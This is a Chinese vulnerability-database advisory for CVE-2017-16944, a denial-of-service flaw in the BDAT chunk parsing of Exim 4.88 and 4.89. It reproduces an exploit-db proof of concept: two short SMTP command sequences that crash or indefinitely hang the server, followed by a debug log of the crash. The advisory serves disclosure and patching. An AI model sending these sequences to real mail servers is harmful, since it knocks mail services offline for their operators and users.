Exim 安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1124455 漏洞类型
发布时间 2017-11-27 更新时间 2019-10-23
CVE编号 CVE-2017-16944 CNNVD-ID CNNVD-201711-1049
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/43184
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201711-1049
|漏洞详情
Exim是英国剑桥大学开发的一个运行于Unix系统中的开源消息传送代理(MTA),它主要负责邮件的路由、转发和投递。 Exim 4.88版本和4.89版本中的SMTP守护进程的receive.c文件的‘receive_msg’函数存在安全漏洞。远程攻击者可利用该漏洞造成拒绝服务(无限循坏和栈耗尽)。
|漏洞EXP
While parsing BDAT data header, exim still scans for '.' and consider it the end of mail.
https://github.com/Exim/exim/blob/master/src/src/receive.c#L1867

Exim goes into an incorrect state after this message is sent because the function pointer receive_getc is not reset. If the following command is also a BDAT, receive_getc and lwr_receive_getc become the same and an infinite loop occurs inside bdat_getc. Program crashes due to running out of stack.
https://github.com/Exim/exim/blob/master/src/src/smtp_in.c#L547

Here is a simple PoC which leads to an infinite loop and program crash:

EHLO localhost
MAIL FROM:<test@localhost>
RCPT TO:<test@localhost>
BDAT 10
.
BDAT 0


Part of debug info
============================
15:36:54 30502 SMTP>> 250 0 byte chunk received
15:36:54 30502 chunking state 0
15:36:54 30502 SMTP>> 250 0 byte chunk received
15:36:54 30502 chunking state 0
15:36:54 30502 SMTP>> 250 0 byte chunk received
15:36:54 30502 chunking state 0
15:36:54 30502 SMTP>> 250 0 byte chunk received
15:36:54 30502 chunking state 0
15:36:54 30502 SMTP>> 250 0 byte chunk received
15:36:54 30502 chunking state 0
15:36:54 30502 SMTP>> 250 0 byte chunk received
15:36:54 30502 chunking state 0
15:36:54 30502 SMTP>> 250 0 byte chunk received
15:36:54 30502 chunking state 0
15:36:54 30502 SMTP>> 250 0 byte chunk received
15:36:54 30502 chunking state 0
15:36:54 30502 SMTP>> 250 0 byte chunk received
15:36:54 30502 chunking state 0
15:36:54 30295 child 30502 ended: status=0x8b
15:36:54 30295   signal exit, signal 11 (core dumped)
15:36:54 30295 1 SMTP accept process now running
15:36:54 30295 Listening...
============================

We also found that this vulnerability can make exim hang(go into an infinite loop without crashing and run forever) even the connection is closed. It seems like this can be used to raise a resource based DoS attack.
This can be triggered using the following command:

EHLO localhost
MAIL FROM:<test@localhost>
RCPT TO:<test@localhost>
BDAT 100
.
MAIL FROM:<test@localhost>
RCPT TO:<test@localhost>
BDAT 0 LAST

// Tested on current master, ubuntu16.04.
|参考资料

来源:MISC
链接:https://bugs.exim.org/show_bug.cgi?id=2201
来源:MISC
链接:https://lists.exim.org/lurker/message/20171125.034842.d1d75cac.en.html